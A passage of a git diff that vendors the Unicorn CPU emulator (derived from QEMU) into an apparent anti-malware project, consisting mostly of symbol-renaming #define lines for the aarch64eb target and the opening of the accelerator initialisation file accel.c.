syn_insn_abort syn_insn_abort_aarch64eb +#define syn_swstep syn_swstep_aarch64eb +#define syn_uncategorized syn_uncategorized_aarch64eb +#define syn_watchpoint syn_watchpoint_aarch64eb +#define syscall_err syscall_err_aarch64eb +#define system_bus_class_init system_bus_class_init_aarch64eb +#define system_bus_info system_bus_info_aarch64eb +#define t2ee_cp_reginfo t2ee_cp_reginfo_aarch64eb +#define table_logic_cc table_logic_cc_aarch64eb +#define target_parse_constraint target_parse_constraint_aarch64eb +#define target_words_bigendian target_words_bigendian_aarch64eb +#define tb_add_jump tb_add_jump_aarch64eb +#define tb_alloc tb_alloc_aarch64eb +#define tb_alloc_page tb_alloc_page_aarch64eb +#define tb_check_watchpoint tb_check_watchpoint_aarch64eb +#define tb_find_fast tb_find_fast_aarch64eb +#define tb_find_pc tb_find_pc_aarch64eb +#define tb_find_slow tb_find_slow_aarch64eb +#define tb_flush tb_flush_aarch64eb 
+#define tb_flush_jmp_cache tb_flush_jmp_cache_aarch64eb +#define tb_free tb_free_aarch64eb +#define tb_gen_code tb_gen_code_aarch64eb +#define tb_hash_remove tb_hash_remove_aarch64eb +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_aarch64eb +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_aarch64eb +#define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64eb +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_aarch64eb +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_aarch64eb +#define tb_jmp_remove tb_jmp_remove_aarch64eb +#define tb_link_page tb_link_page_aarch64eb +#define tb_page_remove tb_page_remove_aarch64eb +#define tb_phys_hash_func tb_phys_hash_func_aarch64eb +#define tb_phys_invalidate tb_phys_invalidate_aarch64eb +#define tb_reset_jump tb_reset_jump_aarch64eb +#define tb_set_jmp_target tb_set_jmp_target_aarch64eb +#define tcg_accel_class_init tcg_accel_class_init_aarch64eb +#define tcg_accel_type tcg_accel_type_aarch64eb +#define tcg_add_param_i32 tcg_add_param_i32_aarch64eb +#define tcg_add_param_i64 tcg_add_param_i64_aarch64eb +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_aarch64eb +#define tcg_allowed tcg_allowed_aarch64eb +#define tcg_canonicalize_memop tcg_canonicalize_memop_aarch64eb +#define tcg_commit tcg_commit_aarch64eb +#define tcg_cond_to_jcc tcg_cond_to_jcc_aarch64eb +#define tcg_constant_folding tcg_constant_folding_aarch64eb +#define tcg_const_i32 tcg_const_i32_aarch64eb +#define tcg_const_i64 tcg_const_i64_aarch64eb +#define tcg_const_local_i32 tcg_const_local_i32_aarch64eb +#define tcg_const_local_i64 tcg_const_local_i64_aarch64eb +#define tcg_context_init tcg_context_init_aarch64eb +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_aarch64eb +#define tcg_cpu_exec tcg_cpu_exec_aarch64eb +#define tcg_current_code_size tcg_current_code_size_aarch64eb +#define tcg_dump_info tcg_dump_info_aarch64eb +#define tcg_dump_ops tcg_dump_ops_aarch64eb +#define tcg_exec_all 
tcg_exec_all_aarch64eb +#define tcg_find_helper tcg_find_helper_aarch64eb +#define tcg_func_start tcg_func_start_aarch64eb +#define tcg_gen_abs_i32 tcg_gen_abs_i32_aarch64eb +#define tcg_gen_add2_i32 tcg_gen_add2_i32_aarch64eb +#define tcg_gen_add_i32 tcg_gen_add_i32_aarch64eb +#define tcg_gen_add_i64 tcg_gen_add_i64_aarch64eb +#define tcg_gen_addi_i32 tcg_gen_addi_i32_aarch64eb +#define tcg_gen_addi_i64 tcg_gen_addi_i64_aarch64eb +#define tcg_gen_andc_i32 tcg_gen_andc_i32_aarch64eb +#define tcg_gen_and_i32 tcg_gen_and_i32_aarch64eb +#define tcg_gen_and_i64 tcg_gen_and_i64_aarch64eb +#define tcg_gen_andi_i32 tcg_gen_andi_i32_aarch64eb +#define tcg_gen_andi_i64 tcg_gen_andi_i64_aarch64eb +#define tcg_gen_br tcg_gen_br_aarch64eb +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_aarch64eb +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_aarch64eb +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_aarch64eb +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_aarch64eb +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_aarch64eb +#define tcg_gen_callN tcg_gen_callN_aarch64eb +#define tcg_gen_code tcg_gen_code_aarch64eb +#define tcg_gen_code_common tcg_gen_code_common_aarch64eb +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_aarch64eb +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_aarch64eb +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_aarch64eb +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_aarch64eb +#define tcg_gen_exit_tb tcg_gen_exit_tb_aarch64eb +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_aarch64eb +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_aarch64eb +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_aarch64eb +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_aarch64eb +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_aarch64eb +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_aarch64eb +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_aarch64eb +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_aarch64eb +#define tcg_gen_goto_tb tcg_gen_goto_tb_aarch64eb 
+#define tcg_gen_ld_i32 tcg_gen_ld_i32_aarch64eb +#define tcg_gen_ld_i64 tcg_gen_ld_i64_aarch64eb +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_aarch64eb +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_aarch64eb +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_aarch64eb +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_aarch64eb +#define tcg_gen_mov_i32 tcg_gen_mov_i32_aarch64eb +#define tcg_gen_mov_i64 tcg_gen_mov_i64_aarch64eb +#define tcg_gen_movi_i32 tcg_gen_movi_i32_aarch64eb +#define tcg_gen_movi_i64 tcg_gen_movi_i64_aarch64eb +#define tcg_gen_mul_i32 tcg_gen_mul_i32_aarch64eb +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_aarch64eb +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_aarch64eb +#define tcg_gen_neg_i32 tcg_gen_neg_i32_aarch64eb +#define tcg_gen_neg_i64 tcg_gen_neg_i64_aarch64eb +#define tcg_gen_not_i32 tcg_gen_not_i32_aarch64eb +#define tcg_gen_op0 tcg_gen_op0_aarch64eb +#define tcg_gen_op1i tcg_gen_op1i_aarch64eb +#define tcg_gen_op2_i32 tcg_gen_op2_i32_aarch64eb +#define tcg_gen_op2_i64 tcg_gen_op2_i64_aarch64eb +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_aarch64eb +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_aarch64eb +#define tcg_gen_op3_i32 tcg_gen_op3_i32_aarch64eb +#define tcg_gen_op3_i64 tcg_gen_op3_i64_aarch64eb +#define tcg_gen_op4_i32 tcg_gen_op4_i32_aarch64eb +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_aarch64eb +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_aarch64eb +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_aarch64eb +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_aarch64eb +#define tcg_gen_op6_i32 tcg_gen_op6_i32_aarch64eb +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_aarch64eb +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_aarch64eb +#define tcg_gen_orc_i32 tcg_gen_orc_i32_aarch64eb +#define tcg_gen_or_i32 tcg_gen_or_i32_aarch64eb +#define tcg_gen_or_i64 tcg_gen_or_i64_aarch64eb +#define tcg_gen_ori_i32 tcg_gen_ori_i32_aarch64eb +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_aarch64eb +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_aarch64eb 
+#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_aarch64eb +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_aarch64eb +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_aarch64eb +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_aarch64eb +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_aarch64eb +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_aarch64eb +#define tcg_gen_sar_i32 tcg_gen_sar_i32_aarch64eb +#define tcg_gen_sari_i32 tcg_gen_sari_i32_aarch64eb +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_aarch64eb +#define tcg_gen_shl_i32 tcg_gen_shl_i32_aarch64eb +#define tcg_gen_shl_i64 tcg_gen_shl_i64_aarch64eb +#define tcg_gen_shli_i32 tcg_gen_shli_i32_aarch64eb +#define tcg_gen_shli_i64 tcg_gen_shli_i64_aarch64eb +#define tcg_gen_shr_i32 tcg_gen_shr_i32_aarch64eb +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_aarch64eb +#define tcg_gen_shr_i64 tcg_gen_shr_i64_aarch64eb +#define tcg_gen_shri_i32 tcg_gen_shri_i32_aarch64eb +#define tcg_gen_shri_i64 tcg_gen_shri_i64_aarch64eb +#define tcg_gen_st_i32 tcg_gen_st_i32_aarch64eb +#define tcg_gen_st_i64 tcg_gen_st_i64_aarch64eb +#define tcg_gen_sub_i32 tcg_gen_sub_i32_aarch64eb +#define tcg_gen_sub_i64 tcg_gen_sub_i64_aarch64eb +#define tcg_gen_subi_i32 tcg_gen_subi_i32_aarch64eb +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_aarch64eb +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_aarch64eb +#define tcg_gen_xor_i32 tcg_gen_xor_i32_aarch64eb +#define tcg_gen_xor_i64 tcg_gen_xor_i64_aarch64eb +#define tcg_gen_xori_i32 tcg_gen_xori_i32_aarch64eb +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_aarch64eb +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_aarch64eb +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_aarch64eb +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_aarch64eb +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_aarch64eb +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_aarch64eb +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_aarch64eb +#define tcg_global_reg_new_i64 
tcg_global_reg_new_i64_aarch64eb +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_aarch64eb +#define tcg_handle_interrupt tcg_handle_interrupt_aarch64eb +#define tcg_init tcg_init_aarch64eb +#define tcg_invert_cond tcg_invert_cond_aarch64eb +#define tcg_la_bb_end tcg_la_bb_end_aarch64eb +#define tcg_la_br_end tcg_la_br_end_aarch64eb +#define tcg_la_func_end tcg_la_func_end_aarch64eb +#define tcg_liveness_analysis tcg_liveness_analysis_aarch64eb +#define tcg_malloc tcg_malloc_aarch64eb +#define tcg_malloc_internal tcg_malloc_internal_aarch64eb +#define tcg_op_defs_org tcg_op_defs_org_aarch64eb +#define tcg_opt_gen_mov tcg_opt_gen_mov_aarch64eb +#define tcg_opt_gen_movi tcg_opt_gen_movi_aarch64eb +#define tcg_optimize tcg_optimize_aarch64eb +#define tcg_out16 tcg_out16_aarch64eb +#define tcg_out32 tcg_out32_aarch64eb +#define tcg_out64 tcg_out64_aarch64eb +#define tcg_out8 tcg_out8_aarch64eb +#define tcg_out_addi tcg_out_addi_aarch64eb +#define tcg_out_branch tcg_out_branch_aarch64eb +#define tcg_out_brcond32 tcg_out_brcond32_aarch64eb +#define tcg_out_brcond64 tcg_out_brcond64_aarch64eb +#define tcg_out_bswap32 tcg_out_bswap32_aarch64eb +#define tcg_out_bswap64 tcg_out_bswap64_aarch64eb +#define tcg_out_call tcg_out_call_aarch64eb +#define tcg_out_cmp tcg_out_cmp_aarch64eb +#define tcg_out_ext16s tcg_out_ext16s_aarch64eb +#define tcg_out_ext16u tcg_out_ext16u_aarch64eb +#define tcg_out_ext32s tcg_out_ext32s_aarch64eb +#define tcg_out_ext32u tcg_out_ext32u_aarch64eb +#define tcg_out_ext8s tcg_out_ext8s_aarch64eb +#define tcg_out_ext8u tcg_out_ext8u_aarch64eb +#define tcg_out_jmp tcg_out_jmp_aarch64eb +#define tcg_out_jxx tcg_out_jxx_aarch64eb +#define tcg_out_label tcg_out_label_aarch64eb +#define tcg_out_ld tcg_out_ld_aarch64eb +#define tcg_out_modrm tcg_out_modrm_aarch64eb +#define tcg_out_modrm_offset tcg_out_modrm_offset_aarch64eb +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_aarch64eb +#define tcg_out_mov tcg_out_mov_aarch64eb 
+#define tcg_out_movcond32 tcg_out_movcond32_aarch64eb +#define tcg_out_movcond64 tcg_out_movcond64_aarch64eb +#define tcg_out_movi tcg_out_movi_aarch64eb +#define tcg_out_op tcg_out_op_aarch64eb +#define tcg_out_pop tcg_out_pop_aarch64eb +#define tcg_out_push tcg_out_push_aarch64eb +#define tcg_out_qemu_ld tcg_out_qemu_ld_aarch64eb +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_aarch64eb +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_aarch64eb +#define tcg_out_qemu_st tcg_out_qemu_st_aarch64eb +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_aarch64eb +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_aarch64eb +#define tcg_out_reloc tcg_out_reloc_aarch64eb +#define tcg_out_rolw_8 tcg_out_rolw_8_aarch64eb +#define tcg_out_setcond32 tcg_out_setcond32_aarch64eb +#define tcg_out_setcond64 tcg_out_setcond64_aarch64eb +#define tcg_out_shifti tcg_out_shifti_aarch64eb +#define tcg_out_st tcg_out_st_aarch64eb +#define tcg_out_tb_finalize tcg_out_tb_finalize_aarch64eb +#define tcg_out_tb_init tcg_out_tb_init_aarch64eb +#define tcg_out_tlb_load tcg_out_tlb_load_aarch64eb +#define tcg_out_vex_modrm tcg_out_vex_modrm_aarch64eb +#define tcg_patch32 tcg_patch32_aarch64eb +#define tcg_patch8 tcg_patch8_aarch64eb +#define tcg_pcrel_diff tcg_pcrel_diff_aarch64eb +#define tcg_pool_reset tcg_pool_reset_aarch64eb +#define tcg_prologue_init tcg_prologue_init_aarch64eb +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_aarch64eb +#define tcg_reg_alloc tcg_reg_alloc_aarch64eb +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_aarch64eb +#define tcg_reg_alloc_call tcg_reg_alloc_call_aarch64eb +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_aarch64eb +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_aarch64eb +#define tcg_reg_alloc_op tcg_reg_alloc_op_aarch64eb +#define tcg_reg_alloc_start tcg_reg_alloc_start_aarch64eb +#define tcg_reg_free tcg_reg_free_aarch64eb +#define tcg_reg_sync tcg_reg_sync_aarch64eb +#define tcg_set_frame tcg_set_frame_aarch64eb +#define 
tcg_set_nop tcg_set_nop_aarch64eb +#define tcg_swap_cond tcg_swap_cond_aarch64eb +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_aarch64eb +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_aarch64eb +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_aarch64eb +#define tcg_target_const_match tcg_target_const_match_aarch64eb +#define tcg_target_init tcg_target_init_aarch64eb +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_aarch64eb +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_aarch64eb +#define tcg_temp_alloc tcg_temp_alloc_aarch64eb +#define tcg_temp_free_i32 tcg_temp_free_i32_aarch64eb +#define tcg_temp_free_i64 tcg_temp_free_i64_aarch64eb +#define tcg_temp_free_internal tcg_temp_free_internal_aarch64eb +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_aarch64eb +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_aarch64eb +#define tcg_temp_new_i32 tcg_temp_new_i32_aarch64eb +#define tcg_temp_new_i64 tcg_temp_new_i64_aarch64eb +#define tcg_temp_new_internal tcg_temp_new_internal_aarch64eb +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_aarch64eb +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_aarch64eb +#define tdb_hash tdb_hash_aarch64eb +#define teecr_write teecr_write_aarch64eb +#define teehbr_access teehbr_access_aarch64eb +#define temp_allocate_frame temp_allocate_frame_aarch64eb +#define temp_dead temp_dead_aarch64eb +#define temps_are_copies temps_are_copies_aarch64eb +#define temp_save temp_save_aarch64eb +#define temp_sync temp_sync_aarch64eb +#define tgen_arithi tgen_arithi_aarch64eb +#define tgen_arithr tgen_arithr_aarch64eb +#define thumb2_logic_op thumb2_logic_op_aarch64eb +#define ti925t_initfn ti925t_initfn_aarch64eb +#define tlb_add_large_page tlb_add_large_page_aarch64eb +#define tlb_flush_entry tlb_flush_entry_aarch64eb +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_aarch64eb +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_aarch64eb 
+#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_aarch64eb +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_aarch64eb +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_aarch64eb +#define tlbi_aa64_va_write tlbi_aa64_va_write_aarch64eb +#define tlbiall_is_write tlbiall_is_write_aarch64eb +#define tlbiall_write tlbiall_write_aarch64eb +#define tlbiasid_is_write tlbiasid_is_write_aarch64eb +#define tlbiasid_write tlbiasid_write_aarch64eb +#define tlbimvaa_is_write tlbimvaa_is_write_aarch64eb +#define tlbimvaa_write tlbimvaa_write_aarch64eb +#define tlbimva_is_write tlbimva_is_write_aarch64eb +#define tlbimva_write tlbimva_write_aarch64eb +#define tlb_is_dirty_ram tlb_is_dirty_ram_aarch64eb +#define tlb_protect_code tlb_protect_code_aarch64eb +#define tlb_reset_dirty_range tlb_reset_dirty_range_aarch64eb +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_aarch64eb +#define tlb_set_dirty tlb_set_dirty_aarch64eb +#define tlb_set_dirty1 tlb_set_dirty1_aarch64eb +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_aarch64eb +#define tlb_vaddr_to_host tlb_vaddr_to_host_aarch64eb +#define token_get_type token_get_type_aarch64eb +#define token_get_value token_get_value_aarch64eb +#define token_is_escape token_is_escape_aarch64eb +#define token_is_keyword token_is_keyword_aarch64eb +#define token_is_operator token_is_operator_aarch64eb +#define tokens_append_from_iter tokens_append_from_iter_aarch64eb +#define to_qiv to_qiv_aarch64eb +#define to_qov to_qov_aarch64eb +#define tosa_init tosa_init_aarch64eb +#define tosa_machine_init tosa_machine_init_aarch64eb +#define tswap32 tswap32_aarch64eb +#define tswap64 tswap64_aarch64eb +#define type_class_get_size type_class_get_size_aarch64eb +#define type_get_by_name type_get_by_name_aarch64eb +#define type_get_parent type_get_parent_aarch64eb +#define type_has_parent type_has_parent_aarch64eb +#define type_initialize type_initialize_aarch64eb +#define type_initialize_interface 
type_initialize_interface_aarch64eb +#define type_is_ancestor type_is_ancestor_aarch64eb +#define type_new type_new_aarch64eb +#define type_object_get_size type_object_get_size_aarch64eb +#define type_register_internal type_register_internal_aarch64eb +#define type_table_add type_table_add_aarch64eb +#define type_table_get type_table_get_aarch64eb +#define type_table_lookup type_table_lookup_aarch64eb +#define uint16_to_float32 uint16_to_float32_aarch64eb +#define uint16_to_float64 uint16_to_float64_aarch64eb +#define uint32_to_float32 uint32_to_float32_aarch64eb +#define uint32_to_float64 uint32_to_float64_aarch64eb +#define uint64_to_float128 uint64_to_float128_aarch64eb +#define uint64_to_float32 uint64_to_float32_aarch64eb +#define uint64_to_float64 uint64_to_float64_aarch64eb +#define unassigned_io_ops unassigned_io_ops_aarch64eb +#define unassigned_io_read unassigned_io_read_aarch64eb +#define unassigned_io_write unassigned_io_write_aarch64eb +#define unassigned_mem_accepts unassigned_mem_accepts_aarch64eb +#define unassigned_mem_ops unassigned_mem_ops_aarch64eb +#define unassigned_mem_read unassigned_mem_read_aarch64eb +#define unassigned_mem_write unassigned_mem_write_aarch64eb +#define update_spsel update_spsel_aarch64eb +#define v6_cp_reginfo v6_cp_reginfo_aarch64eb +#define v6k_cp_reginfo v6k_cp_reginfo_aarch64eb +#define v7_cp_reginfo v7_cp_reginfo_aarch64eb +#define v7mp_cp_reginfo v7mp_cp_reginfo_aarch64eb +#define v7m_pop v7m_pop_aarch64eb +#define v7m_push v7m_push_aarch64eb +#define v8_cp_reginfo v8_cp_reginfo_aarch64eb +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_aarch64eb +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_aarch64eb +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_aarch64eb +#define vapa_cp_reginfo vapa_cp_reginfo_aarch64eb +#define vbar_write vbar_write_aarch64eb +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_aarch64eb +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_aarch64eb +#define vfp_get_fpcr 
vfp_get_fpcr_aarch64eb +#define vfp_get_fpscr vfp_get_fpscr_aarch64eb +#define vfp_get_fpsr vfp_get_fpsr_aarch64eb +#define vfp_reg_offset vfp_reg_offset_aarch64eb +#define vfp_set_fpcr vfp_set_fpcr_aarch64eb +#define vfp_set_fpscr vfp_set_fpscr_aarch64eb +#define vfp_set_fpsr vfp_set_fpsr_aarch64eb +#define visit_end_implicit_struct visit_end_implicit_struct_aarch64eb +#define visit_end_list visit_end_list_aarch64eb +#define visit_end_struct visit_end_struct_aarch64eb +#define visit_end_union visit_end_union_aarch64eb +#define visit_get_next_type visit_get_next_type_aarch64eb +#define visit_next_list visit_next_list_aarch64eb +#define visit_optional visit_optional_aarch64eb +#define visit_start_implicit_struct visit_start_implicit_struct_aarch64eb +#define visit_start_list visit_start_list_aarch64eb +#define visit_start_struct visit_start_struct_aarch64eb +#define visit_start_union visit_start_union_aarch64eb +#define vmsa_cp_reginfo vmsa_cp_reginfo_aarch64eb +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_aarch64eb +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_aarch64eb +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_aarch64eb +#define vmsa_ttbcr_write vmsa_ttbcr_write_aarch64eb +#define vmsa_ttbr_write vmsa_ttbr_write_aarch64eb +#define write_cpustate_to_list write_cpustate_to_list_aarch64eb +#define write_list_to_cpustate write_list_to_cpustate_aarch64eb +#define write_raw_cp_reg write_raw_cp_reg_aarch64eb +#define X86CPURegister32_lookup X86CPURegister32_lookup_aarch64eb +#define x86_op_defs x86_op_defs_aarch64eb +#define xpsr_read xpsr_read_aarch64eb +#define xpsr_write xpsr_write_aarch64eb +#define xscale_cpar_write xscale_cpar_write_aarch64eb +#define xscale_cp_reginfo xscale_cp_reginfo_aarch64eb +#define ARM64_REGS_STORAGE_SIZE ARM64_REGS_STORAGE_SIZE_aarch64eb +#define arm64_release arm64_release_aarch64eb +#define arm64_reg_reset arm64_reg_reset_aarch64eb +#define arm64_reg_read arm64_reg_read_aarch64eb +#define arm64_reg_write arm64_reg_write_aarch64eb 
+#define gen_a64_set_pc_im gen_a64_set_pc_im_aarch64eb +#define aarch64_cpu_register_types aarch64_cpu_register_types_aarch64eb +#define helper_udiv64 helper_udiv64_aarch64eb +#define helper_sdiv64 helper_sdiv64_aarch64eb +#define helper_cls64 helper_cls64_aarch64eb +#define helper_cls32 helper_cls32_aarch64eb +#define helper_rbit64 helper_rbit64_aarch64eb +#define helper_vfp_cmps_a64 helper_vfp_cmps_a64_aarch64eb +#define helper_vfp_cmpes_a64 helper_vfp_cmpes_a64_aarch64eb +#define helper_vfp_cmpd_a64 helper_vfp_cmpd_a64_aarch64eb +#define helper_vfp_cmped_a64 helper_vfp_cmped_a64_aarch64eb +#define helper_vfp_mulxs helper_vfp_mulxs_aarch64eb +#define helper_vfp_mulxd helper_vfp_mulxd_aarch64eb +#define helper_simd_tbl helper_simd_tbl_aarch64eb +#define helper_neon_ceq_f64 helper_neon_ceq_f64_aarch64eb +#define helper_neon_cge_f64 helper_neon_cge_f64_aarch64eb +#define helper_neon_cgt_f64 helper_neon_cgt_f64_aarch64eb +#define helper_recpsf_f32 helper_recpsf_f32_aarch64eb +#define helper_recpsf_f64 helper_recpsf_f64_aarch64eb +#define helper_rsqrtsf_f32 helper_rsqrtsf_f32_aarch64eb +#define helper_rsqrtsf_f64 helper_rsqrtsf_f64_aarch64eb +#define helper_neon_addlp_s8 helper_neon_addlp_s8_aarch64eb +#define helper_neon_addlp_u8 helper_neon_addlp_u8_aarch64eb +#define helper_neon_addlp_s16 helper_neon_addlp_s16_aarch64eb +#define helper_neon_addlp_u16 helper_neon_addlp_u16_aarch64eb +#define helper_frecpx_f32 helper_frecpx_f32_aarch64eb +#define helper_frecpx_f64 helper_frecpx_f64_aarch64eb +#define helper_fcvtx_f64_to_f32 helper_fcvtx_f64_to_f32_aarch64eb +#define helper_crc32_64 helper_crc32_64_aarch64eb +#define helper_crc32c_64 helper_crc32c_64_aarch64eb +#define aarch64_cpu_do_interrupt aarch64_cpu_do_interrupt_aarch64eb +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/accel.c b/ai_anti_malware/unicorn/unicorn-master/qemu/accel.c new file mode 100644 index 0000000..be1e87a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/accel.c 
@@ -0,0 +1,130 @@ +/* + * QEMU System Emulator, accelerator interfaces + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2014 Red Hat Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "sysemu/accel.h" +#include "hw/boards.h" +#include "qemu-common.h" +#include "sysemu/sysemu.h" +#include "qom/object.h" +#include "hw/boards.h" + +// use default size for TCG translated block +#define TCG_TB_SIZE 0 + +static bool tcg_allowed = true; +static int tcg_init(MachineState *ms); +static AccelClass *accel_find(struct uc_struct *uc, const char *opt_name); +static int accel_init_machine(AccelClass *acc, MachineState *ms); +static void tcg_accel_class_init(struct uc_struct *uc, ObjectClass *oc, void *data); + +static int tcg_init(MachineState *ms) +{ + ms->uc->tcg_exec_init(ms->uc, TCG_TB_SIZE * 1024 * 1024); // arch-dependent + return 0; +} + +static const TypeInfo accel_type = { + TYPE_ACCEL, + TYPE_OBJECT, + sizeof(AccelClass), + sizeof(AccelState), +}; + +#define TYPE_TCG_ACCEL ACCEL_CLASS_NAME("tcg") + +static const TypeInfo tcg_accel_type = { + TYPE_TCG_ACCEL, + TYPE_ACCEL, + 0, + 0, + NULL, + NULL, + NULL, + NULL, + NULL, + tcg_accel_class_init, +}; + + +int configure_accelerator(MachineState *ms) +{ + int ret; + bool accel_initialised = false; + AccelClass *acc; + + acc = accel_find(ms->uc, "tcg"); + ret = accel_init_machine(acc, ms); + if (ret < 0) { + fprintf(stderr, "failed to initialize %s: %s\n", + acc->name, + strerror(-ret)); + } else { + accel_initialised = true; + } + + return !accel_initialised; +} + +void register_accel_types(struct uc_struct *uc) +{ + type_register_static(uc, &accel_type); + type_register_static(uc, &tcg_accel_type); +} + +static void tcg_accel_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + AccelClass *ac = ACCEL_CLASS(uc, oc); + ac->name = "tcg"; + ac->init_machine = tcg_init; + ac->allowed = &tcg_allowed; +} + +/* Lookup AccelClass from opt_name. 
